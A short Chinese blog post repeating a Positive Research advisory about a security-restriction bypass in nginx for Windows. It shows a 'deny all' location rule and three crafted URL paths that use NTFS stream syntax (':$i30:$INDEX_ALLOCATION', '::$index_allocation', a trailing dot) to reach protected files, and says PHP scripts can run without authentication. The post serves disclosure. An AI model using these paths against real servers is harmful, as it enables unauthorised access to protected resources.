Chinaunix首页 | 论坛 | 博客
  • 博客访问: 373879
  • 博文数量: 89
  • 博客积分: 3178
  • 博客等级: 中校
  • 技术积分: 965
  • 用 户 组: 普通用户
  • 注册时间: 2008-07-09 15:31
文章分类

全部博文(89)

文章存档

2013年(10)

2012年(33)

2011年(41)

2008年(5)

分类: LINUX

2012-09-26 18:14:30


Testing:
将会绕过认证执行PHP脚本


Vulnerability description:

The specialists of the Positive Research center have a vulnerability detected "Security restrictions bypass" in nginx for Windows.

The system does not consider that NTFS allows users to address folders with extended syntax attribute, while matching the requested resource URL with locations defined in web server configuration. This allows attackers to bypass access restrictions set for static resources.

Exploitation

location ~/directory/ { 
    deny all; 
}

An attacker can bypass this restriction if he/she calls the resource as follows:

"/directory:$i30:$INDEX_ALLOCATION/file" 
"/directory::$index_allocation/file" 
"/directory./file"

阅读(1030) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~